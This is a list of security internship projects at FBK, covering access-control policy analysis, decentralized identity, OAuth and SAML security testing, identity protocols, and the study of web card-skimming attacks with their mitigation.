Projects

Policy Analysis and Translation

Introduction

The definition of access control policies is a critical step in securing IT resources and complying with legislation. Policy administrators need tools to analyze the policies they write and inherit - for instance, to ensure that the set of policies they write and inherit are internally consistent, compliant with legislation, and correctly translated into the implementation of their choice.

Objective

Develop a dockerized framework for ABAC policy analysis as a service.

Task list

  1. Create the docker framework
    1. dockerfile and installation of software from repositories
    2. service endpoints for policy analysis: input policy - say, as json - and objective of analysis, output analysis report
    3. UI for policy definition from keyword database
  2. Policy analysis with pysmt

Prerequisites

Knowledge of docker would be advantageous for Task 1. Knowledge of SMT would be advantageous for task 2.

Supervisor

Alessandro Tomasi - altomasi [at] fbk [dot] eu

Decentralized identity and authentication

Introduction

Decentralized identity (DID) is an emerging proposal to offer identity subjects greater control and flexibility in the management of their digital identities. We are interested in exploring the state of currently available DID-enabling software, particularly with regard to the authentication protocols.

Objective

Develop a proof-of-concept integration of DID with legacy authentication.

Topics

  1. Analysis of hyperledger indy as decentralized identity provider
  2. Security analysis of sdk
  3. Development of client - most likely node or android - to integrate DID in use case
  4. Comparison of DID with eIDAS and OIDC, especially authentication and data exchange
  5. Investigate compliance with GDPR, KYC, and AML.

Prerequisites

Experience of android development would be advantageous for task 2.

Supervisor

Alessandro Tomasi - altomasi [at] fbk [dot] eu

Define attack patterns for OAuth protocol

Description

OAuth is an open standard widely used in corporations for exchanging authentication and authorization data between parties, in particular, between an Authorization Server and a Client. Several solutions for corporations like Google and Facebook are based on OAuth. We propose to define attack patterns for assessing the security of OAuth implementations. This activity can include the implementation of new plugins of an available tool for testing OAuth solutions.

Time frame

Anytime

Supervisor

Andrea Bisegna - a.bisegna [at] fbk [dot] eu

Roberto Carbone - carbone [at] fbk [dot] eu

BSc / MSc

BSc or MSc

Prerequisites

Preferably basic knowledge of Java.

Penetration Testing of a SAML SSO Implementation

Description

SAML SSO an open standard broadly used in corporations for exchanging authentication and authorization data between parties, in particular, between an identity provider and a service provider. Several solutions for corporations like Google together with infrastructures for digital identities as eIDAS (electronic IDentification Authentication and trust Services) and SPID (Sistema Pubblico Identita' Digitale) are based on the SAML Web Browser SSO.

In the context of a joint lab between Security&Trust Unit (FBK) and Istituto Poligrafico Zecca dello Stato, we propose to perform penetration testing for assessing the security of SAML SSO implementations. This activity can include the implementation of new plugins of an available tool for testing SSO solutions.

Time frame

Anytime

Supervisor

Andrea Bisegna - a.bisegna [at] fbk [dot] eu

Roberto Carbone - carbone [at] fbk [dot] eu

BSc / MSc

BSc or MSc

Prerequisites

Preferably basic knowledge of Java and XML.

Identity Management Protocols

Description

We use our digital identities every day, from accessing our email account to online shopping. Underlying these transactions, there are Identity Management protocols that exchange user's attributes among the different entities involved in the communication. During this internship we will agree on and explore one of the current open challenges in this context (e.g., study of some OAuth 2.0 extensions, analysis of SPID for native apps, analysis of SCA for PSD2 and so on).

Time frame

April

Supervisor

Giada Sciarretta - giada.sciarretta [at] fbk [dot] eu

BSc / MSc

BSc or MSc

Prerequisites

Notions of web and mobile security (e.g., authentication, authorization, digital certificates,...).

Analysis of web skimming vulnerabilities and attacks

Description

Web card-skimming is a form of internet or carding fraud whereby a checkout/payment page on a website is compromised when a malicious code is injected onto the page via compromising a third-party script service (e.g., analytics service) in order to steal customer payment information. In recent months, the number of e-commerce websites that were affected by this kind of attacks have increased dramatically affecting not only small store but also big websites. During this internship, we will investigate how this attack works and we will elaborate a mitigation strategy.

Time frame

Anytime in 2020

Supervisor

Biniam Fisseha Demissie - demissie [at] fbk [dot] eu

BSc / MSc

BSc or MSc

Prerequisites

Knowledge of web-oriented programming languages, including Javascript and HTML